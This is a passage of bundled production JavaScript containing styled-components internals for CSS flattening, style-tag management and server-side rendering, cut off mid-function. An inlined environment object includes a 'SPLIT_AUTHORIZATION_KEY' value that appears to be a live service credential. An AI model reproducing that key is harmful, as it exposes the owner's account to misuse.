var flatten = function flatten(chunks, executionContext) {
  return chunks.reduce(function (ruleSet, chunk) {
    /* Remove falsey values */
    if (chunk === undefined || chunk === null || chunk === false || chunk === '') {
      return ruleSet;
    }

    /* Flatten ruleSet */
    if (Array.isArray(chunk)) {
      ruleSet.push.apply(ruleSet, flatten(chunk, executionContext));
      return ruleSet;
    }

    /* Handle other components */
    if (chunk.hasOwnProperty('styledComponentId')) {
      // $FlowFixMe not sure how to make this pass
      ruleSet.push('.' + chunk.styledComponentId);
      return ruleSet;
    }

    /* Either execute or defer the function */
    if (typeof chunk === 'function') {
      if (executionContext) {
        var nextChunk = chunk(executionContext);
        /* Throw if a React Element was given styles */
        if (__WEBPACK_IMPORTED_MODULE_1_react___default.a.isValidElement(nextChunk)) {
          var elementName = chunk.displayName || chunk.name;
          throw new StyledComponentsError(11, elementName);
        }
        ruleSet.push.apply(ruleSet, flatten([nextChunk], executionContext));
      } else ruleSet.push(chunk);

      return ruleSet;
    }

    /* Handle objects */
    ruleSet.push(
    // $FlowFixMe have to add %checks somehow to isPlainObject
    isPlainObject(chunk) ? objToCss(chunk) : chunk.toString());

    return ruleSet;
  }, []);
};

// 

var COMMENT_REGEX = /^\s*\/\/.*$/gm;

// NOTE: This stylis instance is only used to split rules from SSR'd style tags
var stylisSplitter = new __WEBPACK_IMPORTED_MODULE_2_stylis___default.a({
  global: false,
  cascade: true,
  keyframe: false,
  prefix: false,
  compress: false,
  semicolon: true
});

var stylis = new __WEBPACK_IMPORTED_MODULE_2_stylis___default.a({
  global: false,
  cascade: true,
  keyframe: false,
  prefix: true,
  compress: false,
  semicolon: false // NOTE: This means "autocomplete missing semicolons"
});

// Wrap `insertRulePlugin to build a list of rules,
// and then make our own plugin to return the rules. This
// makes it easier to hook into the existing SSR architecture

var parsingRules = [];
// eslint-disable-next-line consistent-return
var returnRulesPlugin = function returnRulesPlugin(context) {
  if (context === -2) {
    var parsedRules = parsingRules;
    parsingRules = [];
    return parsedRules;
  }
};

var parseRulesPlugin = __WEBPACK_IMPORTED_MODULE_3_stylis_rule_sheet___default()(function (rule) {
  parsingRules.push(rule);
});

stylis.use([parseRulesPlugin, returnRulesPlugin]);
stylisSplitter.use([parseRulesPlugin, returnRulesPlugin]);

var stringifyRules = function stringifyRules(rules, selector, prefix) {
  var flatCSS = rules.join('').replace(COMMENT_REGEX, ''); // replace JS comments

  var cssStr = selector && prefix ? prefix + ' ' + selector + ' { ' + flatCSS + ' }' : flatCSS;

  return stylis(prefix || !selector ? '' : selector, cssStr);
};

var splitByRules = function splitByRules(css) {
  return stylisSplitter('', css);
};

// 

function isStyledComponent(target) /* : %checks */{
  return (
    // $FlowFixMe TODO: flow for styledComponentId
    typeof target === 'function' && typeof target.styledComponentId === 'string'
  );
}

// 

/* This function is DEPRECATED and will be removed on the next major version release.
 * It was needed to rehydrate all style blocks prepended to chunks before React
 * tries to rehydrate its HTML stream. Since the master StyleSheet will now detect
 * the use of streamed style tags and will perform the rehydration earlier when needed
 * this function will not be needed anymore */
function consolidateStreamedStyles() {
  if (false) {
    // eslint-disable-next-line no-console
    console.warn('styled-components automatically does streaming SSR rehydration now.\n' + 'Calling consolidateStreamedStyles manually is no longer necessary and a noop now.\n' + '- Please remove the consolidateStreamedStyles call from your client.');
  }
}

// 
/* eslint-disable no-bitwise */

/* This is the "capacity" of our alphabet i.e. 2x26 for all letters plus their capitalised
 * counterparts */
var charsLength = 52;

/* start at 75 for 'a' until 'z' (25) and then start at 65 for capitalised letters */
var getAlphabeticChar = function getAlphabeticChar(code) {
  return String.fromCharCode(code + (code > 25 ? 39 : 97));
};

/* input a number, usually a hash and convert it to base-52 */
var generateAlphabeticName = function generateAlphabeticName(code) {
  var name = '';
  var x = void 0;

  /* get a char and divide by alphabet-length */
  for (x = code; x > charsLength; x = Math.floor(x / charsLength)) {
    name = getAlphabeticChar(x % charsLength) + name;
  }

  return getAlphabeticChar(x % charsLength) + name;
};

// 

var interleave = (function (strings, interpolations) {
  var result = [strings[0]];

  for (var i = 0, len = interpolations.length; i < len; i += 1) {
    result.push(interpolations[i], strings[i + 1]);
  }

  return result;
});

// 
var EMPTY_ARRAY = Object.freeze([]);
var EMPTY_OBJECT = Object.freeze({});

// 

var css = (function (styles) {
  for (var _len = arguments.length, interpolations = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    interpolations[_key - 1] = arguments[_key];
  }

  if (typeof styles === 'function' || isPlainObject(styles)) {
    // $FlowFixMe
    return flatten(interleave(EMPTY_ARRAY, [styles].concat(interpolations)));
  }

  // $FlowFixMe
  return flatten(interleave(styles, interpolations));
});

// 


var SC_ATTR = typeof process !== 'undefined' && Object({"SERVICES_APTRINSIC_ENABLED":true,"SERVICES_NEW_RELIC_ENABLED":false,"SERVICES_SENTRY_ENABLED":true,"NODE_ENV":"production","ENV":"production","TRUSTAR_API_HOST":undefined,"TRUSTAR_STATION_HOST":undefined,"SPLIT_AUTHORIZATION_KEY":"7iki1574js01dvm0oq3kaaj3755bj02lgaeo","__VERSION__":"v5.2.3-23-gdec5e66"}).SC_ATTR || 'data-styled-components';
var SC_STREAM_ATTR = 'data-styled-streamed';
var CONTEXT_KEY = '__styled-components-stylesheet__';

var IS_BROWSER = typeof window !== 'undefined' && 'HTMLElement' in window;

var DISABLE_SPEEDY = "production" !== 'production';

// 
var SC_COMPONENT_ID = /^[^\S\n]*?\/\* sc-component-id:\s*(\S+)\s+\*\//gm;

var extractComps = (function (maybeCSS) {
  var css = '' + (maybeCSS || ''); // Definitely a string, and a clone
  var existingComponents = [];
  css.replace(SC_COMPONENT_ID, function (match, componentId, matchIndex) {
    existingComponents.push({ componentId: componentId, matchIndex: matchIndex });
    return match;
  });
  return existingComponents.map(function (_ref, i) {
    var componentId = _ref.componentId,
        matchIndex = _ref.matchIndex;

    var nextComp = existingComponents[i + 1];
    var cssFromDOM = nextComp ? css.slice(matchIndex, nextComp.matchIndex) : css.slice(matchIndex);
    return { componentId: componentId, cssFromDOM: cssFromDOM };
  });
});

// 
/* eslint-disable camelcase, no-undef */

var getNonce = (function () {
  return  true ? __webpack_require__.nc : null;
});

// 
// Helper to call a given function, only once
var once = (function (cb) {
  var called = false;

  return function () {
    if (!called) {
      called = true;
      cb();
    }
  };
});

// 
/* These are helpers for the StyleTags to keep track of the injected
 * rule names for each (component) ID that they're keeping track of.
 * They're crucial for detecting whether a name has already been
 * injected.
 * (This excludes rehydrated names) */

/* adds a new ID:name pairing to a names dictionary */
var addNameForId = function addNameForId(names, id, name) {
  if (name) {
    // eslint-disable-next-line no-param-reassign
    var namesForId = names[id] || (names[id] = Object.create(null));
    namesForId[name] = true;
  }
};

/* resets an ID entirely by overwriting it in the dictionary */
var resetIdNames = function resetIdNames(names, id) {
  // eslint-disable-next-line no-param-reassign
  names[id] = Object.create(null);
};

/* factory for a names dictionary checking the existance of an ID:name pairing */
var hasNameForId = function hasNameForId(names) {
  return function (id, name) {
    return names[id] !== undefined && names[id][name];
  };
};

/* stringifies names for the html/element output */
var stringifyNames = function stringifyNames(names) {
  var str = '';
  // eslint-disable-next-line guard-for-in
  for (var id in names) {
    str += Object.keys(names[id]).join(' ') + ' ';
  }
  return str.trim();
};

/* clones the nested names dictionary */
var cloneNames = function cloneNames(names) {
  var clone = Object.create(null);
  // eslint-disable-next-line guard-for-in
  for (var id in names) {
    clone[id] = _extends({}, names[id]);
  }
  return clone;
};

// 

/* These are helpers that deal with the insertRule (aka speedy) API
 * They are used in the StyleTags and specifically the speedy tag
 */

/* retrieve a sheet for a given style tag */
var sheetForTag = function sheetForTag(tag) {
  // $FlowFixMe
  if (tag.sheet) return tag.sheet;

  /* Firefox quirk requires us to step through all stylesheets to find one owned by the given tag */
  var size = document.styleSheets.length;
  for (var i = 0; i < size; i += 1) {
    var sheet = document.styleSheets[i];
    // $FlowFixMe
    if (sheet.ownerNode === tag) return sheet;
  }

  /* we should always be able to find a tag */
  throw new StyledComponentsError(10);
};

/* insert a rule safely and return whether it was actually injected */
var safeInsertRule = function safeInsertRule(sheet, cssRule, index) {
  /* abort early if cssRule string is falsy */
  if (!cssRule) return false;

  var maxIndex = sheet.cssRules.length;

  try {
    /* use insertRule and cap passed index with maxIndex (no of cssRules) */
    sheet.insertRule(cssRule, index <= maxIndex ? index : maxIndex);
  } catch (err) {
    /* any error indicates an invalid rule */
    return false;
  }

  return true;
};

/* deletes `size` rules starting from `removalIndex` */
var deleteRules = function deleteRules(sheet, removalIndex, size) {
  var lowerBound = removalIndex - size;
  for (var i = removalIndex; i > lowerBound; i -= 1) {
    sheet.deleteRule(i);
  }
};

// 

/* this marker separates component styles and is important for rehydration */
var makeTextMarker = function makeTextMarker(id) {
  return '\n/* sc-component-id: ' + id + ' */\n';
};

/* add up all numbers in array up until and including the index */
var addUpUntilIndex = function addUpUntilIndex(sizes, index) {
  var totalUpToIndex = 0;
  for (var i = 0; i <= index; i += 1) {
    totalUpToIndex += sizes[i];
  }

  return totalUpToIndex;
};

/* create a new style tag after lastEl */
var makeStyleTag = function makeStyleTag(target, tagEl, insertBefore) {
  var el = document.createElement('style');
  el.setAttribute(SC_ATTR, '');

  var nonce = getNonce();
  if (nonce) {
    el.setAttribute('nonce', nonce);
  }

  /* Work around insertRule quirk in EdgeHTML */
  el.appendChild(document.createTextNode(''));

  if (target && !tagEl) {
    /* Append to target when no previous element was passed */
    target.appendChild(el);
  } else {
    if (!tagEl || !target || !tagEl.parentNode) {
      throw new StyledComponentsError(6);
    }

    /* Insert new style tag after the previous one */
    tagEl.parentNode.insertBefore(el, insertBefore ? tagEl : tagEl.nextSibling);
  }

  return el;
};

/* takes a css factory function and outputs an html styled tag factory */
var wrapAsHtmlTag = function wrapAsHtmlTag(css, names) {
  return function (additionalAttrs) {
    var nonce = getNonce();
    var attrs = [nonce && 'nonce="' + nonce + '"', SC_ATTR + '="' + stringifyNames(names) + '"', additionalAttrs];

    var htmlAttr = attrs.filter(Boolean).join(' ');
    return '<style ' + htmlAttr + '>' + css() + '</style>';
  };
};

/* takes a css factory function and outputs an element factory */
var wrapAsElement = function wrapAsElement(css, names) {
  return function () {
    var _props;

    var props = (_props = {}, _props[SC_ATTR] = stringifyNames(names), _props);

    var nonce = getNonce();
    if (nonce) {
      // $FlowFixMe
      props.nonce = nonce;
    }

    // eslint-disable-next-line react/no-danger
    return __WEBPACK_IMPORTED_MODULE_1_react___default.a.createElement('style', _extends({}, props, { dangerouslySetInnerHTML: { __html: css() } }));
  };
};

var getIdsFromMarkersFactory = function getIdsFromMarkersFactory(markers) {
  return function () {
    return Object.keys(markers);
  };
};

/* speedy tags utilise insertRule */
var makeSpeedyTag = function makeSpeedyTag(el, getImportRuleTag) {
  var names = Object.create(null);
  var markers = Object.create(null);
  var sizes = [];

  var extractImport = getImportRuleTag !== undefined;
  /* indicates whther getImportRuleTag was called */
  var usedImportRuleTag = false;

  var insertMarker = function insertMarker(id) {
    var prev = markers[id];
    if (prev !== undefined) {
      return prev;
    }

    markers[id] = sizes.length;
    sizes.push(0);
    resetIdNames(names, id);

    return markers[id];
  };

  var insertRules = function insertRules(id, cssRules, name) {
    var marker = insertMarker(id);
    var sheet = sheetForTag(el);
    var insertIndex = addUpUntilIndex(sizes, marker);

    var injectedRules = 0;
    var importRules = [];
    var cssRulesSize = cssRules.length;

    for (var i = 0; i < cssRulesSize; i += 1) {
      var cssRule = cssRules[i];
      var mayHaveImport = extractImport; /* @import rules are reordered to appear first */
      if (mayHaveImport && cssRule.indexOf('@import') !== -1) {
        importRules.push(cssRule);
      } else if (safeInsertRule(sheet, cssRule, insertIndex + injectedRules)) {
        mayHaveImport = false;
        injectedRules += 1;
      }
    }

    if (extractImport && importRules.length > 0) {
      usedImportRuleTag = true;
      // $FlowFixMe
      getImportRuleTag().insertRules(id + '-import', importRules);
    }

    sizes[marker] += injectedRules; /* add up no of injected rules */
    addNameForId(names, id, name);
  };

  var removeRules = function removeRules(id) {
    var marker = markers[id];
    if (marker === undefined) return;

    var size = sizes[marker];
    var sheet = sheetForTag(el);
    var removalIndex = addUpUntilIndex(sizes, marker);
    deleteRules(sheet, removalIndex, size);
    sizes[marker] = 0;
    resetIdNames(names, id);

    if (extractImport && usedImportRuleTag) {
      // $FlowFixMe
      getImportRuleTag().removeRules(id + '-import');
    }
  };

  var css = function css() {
    var _sheetForTag = sheetForTag(el),
        cssRules = _sheetForTag.cssRules;

    var str = '';

    // eslint-disable-next-line guard-for-in
    for (var id in markers) {
      str += makeTextMarker(id);
      var marker = markers[id];
      var end = addUpUntilIndex(sizes, marker);
      var size = sizes[marker];
      for (var i = end - size; i < end; i += 1) {
        var rule = cssRules[i];
        if (rule !== undefined) {
          str += rule.cssText;
        }
      }
    }

    return str;
  };

  return {
    clone: function clone() {
      throw new StyledComponentsError(5);
    },

    css: css,
    getIds: getIdsFromMarkersFactory(markers),
    hasNameForId: hasNameForId(names),
    insertMarker: insertMarker,
    insertRules: insertRules,
    removeRules: removeRules,
    sealed: false,
    styleTag: el,
    toElement: wrapAsElement(css, names),
    toHTML: wrapAsHtmlTag(css, names)
  };
};

var makeTextNode = function makeTextNode(id) {
  return document.createTextNode(makeTextMarker(id));
};

var makeBrowserTag = function makeBrowserTag(el, getImportRuleTag) {
  var names = Object.create(null);
  var markers = Object.create(null);

  var extractImport = getImportRuleTag !== undefined;

  /* indicates whther getImportRuleTag was called */
  var usedImportRuleTag = false;

  var insertMarker = function insertMarker(id) {
    var prev = markers[id];
    if (prev !== undefined) {
      return prev;
    }

    markers[id] = makeTextNode(id);
    el.appendChild(markers[id]);
    names[id] = Object.create(null);

    return markers[id];
  };

  var insertRules = function insertRules(id, cssRules, name) {
    var marker = insertMarker(id);
    var importRules = [];
    var cssRulesSize = cssRules.length;

    for (var i = 0; i < cssRulesSize; i += 1) {
      var rule = cssRules[i];
      var mayHaveImport = extractImport;
      if (mayHaveImport && rule.indexOf('@import') !== -1) {
        importRules.push(rule);
      } else {
        mayHaveImport = false;
        var separator = i === cssRulesSize - 1 ? '' : ' ';
        marker.appendData('' + rule + separator);
      }
    }

    addNameForId(names, id, name);

    if (extractImport && importRules.length > 0) {
      usedImportRuleTag = true;
      // $FlowFixMe
      getImportRuleTag().insertRules(id + '-import', importRules);
    }
  };

  var removeRules = function removeRules(id) {
    var marker = markers[id];
    if (marker === undefined) return;

    /* create new empty text node and replace the current one */
    var newMarker = makeTextNode(id);
    el.replaceChild(newMarker, marker);
    markers[id] = newMarker;
    resetIdNames(names, id);

    if (extractImport && usedImportRuleTag) {
      // $FlowFixMe
      getImportRuleTag().removeRules(id + '-import');
    }
  };

  var css = function css() {
    var str = '';
    // eslint-disable-next-line guard-for-in
    for (var id in markers) {
      str += markers[id].data;
    }
    return str;
  };

  return {
    clone: function clone() {
      throw new StyledComponentsError(5);
    },

    css: css,
    getIds: getIdsFromMarkersFactory(markers),
    hasNameForId: hasNameForId(names),
    insertMarker: insertMarker,
    insertRules: insertRules,
    removeRules: removeRules,
    sealed: false,
    styleTag: el,
    toElement: wrapAsElement(css, names),
    toHTML: wrapAsHtmlTag(css, names)
  };
};

var makeServerTagInternal = function makeServerTagInternal(namesArg, markersArg) {
  var names = namesArg === undefined ? Object.create(null) : namesArg;
  var markers = markersArg === undefined ? Object.create(null) : markersArg;

  var insertMarker = function insertMarker(id) {
    var prev = markers[id];
    if (prev !== undefined) {
      return prev;
    }

    return markers[id] = [''];
  };

  var insertRules = function insertRules(id, cssRules, name) {
    var marker = insertMarker(id);
    marker[0] += cssRules.join(' ');
    addNameForId(names, id, name);
  };

  var removeRules = function removeRules(id) {
    var marker = markers[id];
    if (marker === undefined) return;
    marker[0] = '';
    resetIdNames(names, id);
  };

  var css = function css() {
    var str = '';
    // eslint-disable-next-line guard-for-in
    for (var id in markers) {
      var cssForId = markers[id][0];
      if (cssForId) {
        str += makeTextMarker(id) + cssForId;
      }
    }
    return str;
  };

  var clone = function clone() {
    var namesClone = cloneNames(names);
    var markersClone = Object.create(null);

    // eslint-disable-next-line guard-for-in
    for (var id in markers) {
      markersClone[id] = [markers[id][0]];
    }

    return makeServerTagInternal(namesClone, markersClone);
  };

  var tag = {
    clone: clone,
    css: css,
    getIds: getIdsFromMarkersFactory(markers),
    hasNameForId: hasNameForId(names),
    insertMarker: insertMarker,
    insertRules: insertRules,
    removeRules: removeRules,
    sealed: false,
    styleTag: null,
    toElement: wrapAsElement(css, names),
    toHTML: wrapAsHtmlTag(css, names)
  };

  return tag;
};

var makeServerTag = function makeServerTag() {
  return makeServerTagInternal();
};

var makeTag = function makeTag(target, tagEl, forceServer, insertBefore, getImportRuleTag) {
  if (IS_BROWSER && !forceServer) {
    var el = makeStyleTag(target, tagEl, insertBefore);

    if (DISABLE_SPEEDY) {
      return makeBrowserTag(el, getImportRuleTag);
    } else {
      return makeSpeedyTag(el, getImportRuleTag);
    }
  }

  return makeServerTag();
};

/* wraps a given tag so that rehydration is performed once when necessary */
var makeRehydrationTag = function makeRehydrationTag(tag, els, extracted, immediateRehydration) {
  /* rehydration function that adds all rules to the new tag */
  var rehydrate = once(function () {
    /* add all extracted components to the new tag */
    for (var i = 0, len = extracted.length; i < len; i += 1) {
      var _extracted$i = extracted[i],
          componentId = _extracted$i.componentId,
          cssFromDOM = _extracted$i.cssFromDOM;

      var cssRules = splitByRules(cssFromDOM);
      tag.insertRules(componentId, cssRules);
    }

    /* remove old HTMLStyleElements, since they have been rehydrated */
    for (var _i = 0, _len = els.length; _i < _len; _i += 1) {
      var el = els[_i];
      if (el.parentNode) {
        el.parentNode.removeChild(el);
      }
    }
  });

  if (immediateRehydration) rehydrate();

  return _extends({}, tag, {
    /* add rehydration hook to insertion methods */
    insertMarker: function insertMarker(id) {
      rehydrate();
      return tag.insertMarker(id);
    },
    insertRules: function insertRules(id, cssRules, name) {
      rehydrate();
      return tag.insertRules(id, cssRules, name);
    }
  });
};

// 

var SPLIT_REGEX = /\s+/;

/* determine the maximum number of components before tags are sharded */
var MAX_SIZE = void 0;
if (IS_BROWSER) {
  /* in speedy mode we can keep a lot more rules in a sheet before a slowdown can be expected */
  MAX_SIZE = DISABLE_SPEEDY ? 40 : 1000;
} else {
  /* for servers we do not need to shard at all */
  MAX_SIZE = -1;
}

var sheetRunningId = 0;
var master = void 0;

var StyleSheet = function () {
  /* a map from ids to tags */
  /* deferred rules for a given id */
  /* this is used for not reinjecting rules via hasNameForId() */
  /* when rules for an id are removed using remove() we have to ignore rehydratedNames for it */
  /* a list of tags belonging to this StyleSheet */
  /* a tag for import rules */
  /* current capacity until a new tag must be created */
  /* children (aka clones) of this StyleSheet inheriting all and future injections */

  function StyleSheet() {
    var _this = this;

    var target = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : IS_BROWSER ? document.head : null;
    var forceServer = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : false;
    classCallCheck(this, StyleSheet);

    this.getImportRuleTag = function () {
      var importRuleTag = _this.importRuleTag;

      if (importRuleTag !== undefined) {
        return importRuleTag;
      }

      var firstTag = _this.tags[0];
      var insertBefore = true;

      return _this.importRuleTag = makeTag(_this.target, firstTag ? firstTag.styleTag : null, _this.forceServer, insertBefore);
    };

    sheetRunningId += 1;
    this.id = sheetRunningId;
    this.forceServer = forceServer;
    this.target = forceServer ? null : target;
    this.tagMap = {};
    this.deferred = {};
    this.rehydratedNames = {};
    this.ignoreRehydratedNames = {};
    this.tags = [];
    this.capacity = 1;
    this.clones = [];
  }

  /* rehydrate all SSR'd style tags */


  StyleSheet.prototype.rehydrate = function rehydrate() {
    if (!IS_BROWSER || this.forceServer) {
      return this;
    }

    var els = [];
    var extracted = [];
    var isStreamed = false;

    /* retrieve all of our SSR style elements from the DOM */
    var nodes = document.querySelectorAll('style[' + SC_ATTR + ']');
    var nodesSize = nodes.length;

    /* abort rehydration if no previous style tags were found */
    if (nodesSize === 0) {
      return this;
    }

    for (var i = 0; i < nodesSize; i += 1) {
      // $FlowFixMe: We can trust that all elements in this query are style elements
      var el = nodes[i];

      /* check if style tag is a streamed tag */
      if (!isStreamed) isStreamed = !!el.getAttribute(SC_STREAM_ATTR);

      /* retrieve all component names */
      var elNames = (el.getAttribute(SC_ATTR) || '').trim().split(SPLIT_REGEX);
      var elNamesSize = elNames.length;
      for (var j = 0; j < elNamesSize; j += 1) {
        var name = elNames[j];
        /* add rehydrated name to sheet to avoid readding styles */
        this.rehydratedNames[name] = true;
      }

      /* extract all components and their CSS */
      extracted.push.apply(extracted, extractComps(el.textContent));

      /* store original HTMLStyleElement */
      els.push(el);
    }

    /* abort rehydration if nothing was extracted */
    var extractedSize = extracted.length;
    if (extractedSize === 0) {
      return this;
    }

    /* create a tag to be used for rehydration */
    var tag = this.makeTag(null);
    var rehydrationTag = makeRehydrationTag(tag, els, extracted, isStreamed);

    /* reset capacity and adjust MAX_SIZE by the initial size of the rehydration */
    this.capacity = Math.max(1, MAX_SIZE - extractedSize);
    this.tags.push(rehydrationTag);

    /* retrieve all component ids */
    for (var _j = 0; _j < extractedSize; _j += 1) {
      this.tagMap[extracted[_j].componentId] = rehydrationTag;
    }

    return this;
  };

  /* retrieve a "master" instance of StyleSheet which is typically used when no other is available
   * The master StyleSheet is targeted by injectGlobal, keyframes, and components outside of any
    * StyleSheetManager's context */


  /* reset the internal "master" instance */
  StyleSheet.reset = function reset() {
    var forceServer = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;

    master = new StyleSheet(undefined, forceServer).rehydrate();
  };

  /* adds "children" to the StyleSheet that inherit all of the parents' rules
   * while their own rules do not affect the parent */


  StyleSheet.prototype.clone = function clone() {
    var sheet = new StyleSheet(this.target, this.forceServer);

    /* add to clone array */
    this.clones.push(sheet);

    /* clone all tags */
    sheet.tags = this.tags.map(function (tag) {
      var ids = tag.getIds();
      var newTag = tag.clone();

      /* reconstruct tagMap */
      for (var i = 0; i < ids.length; i += 1) {
        sheet.tagMap[ids[i]] = newTag;
      }

      return newTag;
    });

    /* clone other maps */
    sheet.rehydratedNames = _extends({}, this.rehydratedNames);
    sheet.deferred = _extends({}, this.deferred);

    return sheet;
  };

  /* force StyleSheet to create a new tag on the next injection */


  StyleSheet.prototype.sealAllTags = function sealAllTags() {
    this.capacity = 1;

    this.tags.forEach(function (tag) {
      // eslint-disable-next-line no-param-reassign
      tag.sealed = true;
    });
  };

  StyleSheet.prototype.makeTag = function makeTag$$1(tag) {
    var lastEl = tag ? tag.styleTag : null;
    var insertBefore = false;

    return makeTag(this.target, lastEl, this.forceServer, insertBefore, this.getImportRuleTag);
  };

  /* get a tag for a given componentId, assign the componentId to one, or shard */
  StyleSheet.prototype.getTagForId = function getTagForId(id) {
    /* simply return a tag, when the componentId was already assigned one */
    var prev = this.tagMap[id];
    if (prev !== undefined && !prev.sealed) {
      return prev;
    }

    var tag = this.tags[this.tags.length - 1];

    /* shard (create a new tag) if the tag is exhausted (See MAX_SIZE) */
    this.capacity -= 1;

    if (this.capacity === 0) {
      this.capacity = MAX_SIZE;
      tag = this.makeTag(tag);
      this.tags.push(tag);
    }

    return this.tagMap[id] = tag;
  };

  /* mainly for injectGlobal to check for its id */


  StyleSheet.prototype.hasId = function hasId(id) {
    return this.tagMap[id] !== undefined;
  };

  /* caching layer checking id+name to already have a corresponding tag and injected rules */


  StyleSheet.prototype.hasNameForId = function hasNameForId(id, name) {
    /* exception for rehydrated names which are checked separately */
    if (this.ignoreRehydratedNames[id] === undefined && this.rehydratedNames[name]) {
      return true;
    }

    var tag = this.tagMap[id];
    return tag !== undefined && tag.hasNameForId(id, name);
  };

  /* registers a componentId and registers it on its tag */


  StyleSheet.prototype.deferredInject = function deferredInject(id, cssRules) {
    /* don't inject when the id is already registered */
    if (this.tagMap[id] !== undefined) return;

    var clones = this.clones;

    for (var i = 0; i < clones.length; i += 1) {
      clones[i].deferredInject(id, cssRules);
    }

    this.getTagForId(id).insertMarker(id);
    this.deferred[id] = cssRules;
  };

  /* injects rules for a given id with a name that will need to be cached */


  StyleSheet.prototype.inject = function inject(id, cssRules, name) {
    var clones = this.clones;


    for (var i = 0; i < clones.length; i += 1) {
      clones[i].inject(id, cssRules, name);
    }

    var tag = this.getTagForId(id);

    /* add deferred rules for component */
    if (this.deferred[id] !== undefined) {
      // Combine passed cssRules with previously deferred CSS rules
      // NOTE: We cannot mutate the deferred array itself as all clones
      // do the same (see clones[i].inject)
      var rules = this.deferred[id].concat(cssRules);
      tag.insertRules(id, rules, name);

      this.deferred[id] = undefined;
    } else {
      tag.insertRules(id, cssRules, name);
    }
  };

  /* removes all rules for a given id, which doesn't remove its marker but resets it */


  StyleSheet.prototype.remove = function remove(id) {
    var tag = this.tagMap[id];
    if (tag === undefined) return;

    var clones = this.clones;

    for (var i = 0; i < clones.length; i += 1) {
      clones[i].remove(id);
    }

    /* remove all rules from the tag */
    tag.removeRules(id);
    /* ignore possible rehydrated names */
    this.ignoreRehydratedNames[id] = true;
    /* delete possible deferred rules */
    this.deferred[id] = undefined;
  };

  StyleSheet.prototype.toHTML = function toHTML() {
    return this.tags.map(function (tag) {
      return tag.toHTML();
    }).join('');
  };

  StyleSheet.prototype.toReactElements = function toReactElements() {
    var id = this.id;


    return this.tags.map(function (tag, i) {
      var key = 'sc-' + id + '-' + i;
      return Object(__WEBPACK_IMPORTED_MODULE_1_react__["cloneElement"])(tag.toElement(), { key: key });
    });
  };

  createClass(StyleSheet, null, [{
    key: 'master',
    get: function get$$1() {
      return master || (master = new StyleSheet().rehydrate());
    }

    /* NOTE: This is just for backwards-compatibility with jest-styled-components */

  }, {
    key: 'instance',
    get: function get$$1() {
      return StyleSheet.master;
    }
  }]);
  return StyleSheet;
}();

var _StyleSheetManager$ch;

var StyleSheetManager = function (_Component) {
  inherits(StyleSheetManager, _Component);

  function StyleSheetManager() {
    classCallCheck(this, StyleSheetManager);
    return possibleConstructorReturn(this, _Component.apply(this, arguments));
  }

  StyleSheetManager.prototype.getChildContext = function getChildContext() {
    var _ref;

    return _ref = {}, _ref[CONTEXT_KEY] = this.sheetInstance, _ref;
  };

  StyleSheetManager.prototype.componentWillMount = function componentWillMount() {
    if (this.props.sheet) {
      this.sheetInstance = this.props.sheet;
    } else if (this.props.target) {
      this.sheetInstance = new StyleSheet(this.props.target);
    } else {
      throw new StyledComponentsError(4);
    }
  };

  StyleSheetManager.prototype.render = function render() {
    /* eslint-disable react/prop-types */
    // Flow v0.43.1 will report an error accessing the `children` property,
    // but v0.47.0 will not. It is necessary to use a type cast instead of
    // a "fixme" comment to satisfy both Flow versions.
    return __WEBPACK_IMPORTED_MODULE_1_react___default.a.Children.only(this.props.children);
  };

  return StyleSheetManager;
}(__WEBPACK_IMPORTED_MODULE_1_react__["Component"]);

StyleSheetManager.childContextTypes = (_StyleSheetManager$ch = {}, _StyleSheetManager$ch[CONTEXT_KEY] = __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.oneOfType([__WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.instanceOf(StyleSheet), __WEBPACK_IMPORTED_MODULE_4_prop_types___default.a.instanceOf(ServerStyleSheet)]).isRequired, _StyleSheetManager$ch);
 false ? StyleSheetManager.propTypes = {
  sheet: PropTypes.oneOfType([PropTypes.instanceOf(StyleSheet), PropTypes.instanceOf(ServerStyleSheet)]),
  target: PropTypes.shape({
    appendChild: PropTypes.func.isRequired
  })
} : void 0;

// 

var ServerStyleSheet = function () {
  function ServerStyleSheet() {
    classCallCheck(this, ServerStyleSheet);

    /* The master sheet might be reset, so keep a reference here */
    this.masterSheet = StyleSheet.master;
    this.instance = this.masterSheet.clone();
    this.closed = false;
  }

  ServerStyleSheet.prototype.complete = function complete() {
    if (!this.closed) {
      /* Remove closed StyleSheets from the master sheet */
      var index = this.masterSheet.clones.indexOf(this.instance);
      this.masterSheet.clones.splice(index, 1);
      this.closed = true;
    }
  };

  ServerStyleSheet.prototype.collectStyles = function collectStyles(children) {
    if (this.closed) {
      throw new StyledComponentsError(2);
    }

    return __WEBPACK_IMPORTED_MODULE_1_react___default.a.createElement(
      StyleSheetManager,
      { sheet: this.instance },
      children
    );
  };

  ServerStyleSheet.prototype.getStyleTags = function getStyleTags() {
    this.complete();
    return this.instance.toHTML();
  };

  ServerStyleSheet.prototype.getStyleElement = function getStyleElement() {
    this.complete();
    return this.instance.toReactElements();
  };

  ServerStyleSheet.prototype.interleaveWithNodeStream = function interleaveWithNodeStream(readableStream) {
    var _this = this;

    {
      throw new StyledComponentsError(3);
    }

    /* the tag index keeps track of which tags have already been emitted */
    var instance = this.instance;

    var instanceTagIndex = 0;

    var streamAttr = SC_STREAM_ATTR + '="true"';

    var transformer = new stream.Transform({
      transform: function appendStyleChunks(chunk, /* encoding */_, callback) {
        var tags = instance.tags;

        var html = '';

        /* retrieve html for each new style tag */
        for (; instanceTagIndex < tags.length; instanceTagIndex += 1) {
          var tag = tags[instanceTagIndex];
          html += tag.toHTML(streamAttr);
        }

        /* force our StyleSheets to emit entirely new tags */
        instance.sealAllTags();

        /* prepend style html to chunk */
        this.push(html + chunk);
        callback();
      }
    });

    readableStream.on('end', function () {
      return _this.complete();
    });
    readableStream.on('error', function (err) {
      _this.complete();

      // forward the error to the transform stream
      transformer.emit('error', err);
    });

    return readableStream.pipe(transformer);
  };

  return ServerStyleSheet;
}();

// 

var LIMIT = 200;

var createWarnTooManyClasses = (function (displayName) {
  var generatedClasses = {};
  var warningSeen = false;

  return function (className) {
    if (!warningSeen) {
      generatedClasses[className] = true;
      if (Object.keys(generatedClasses).length >= LIMIT) {
        // Unable to find latestRule in test environment.
        /* eslint-disable no-console, prefer-template */
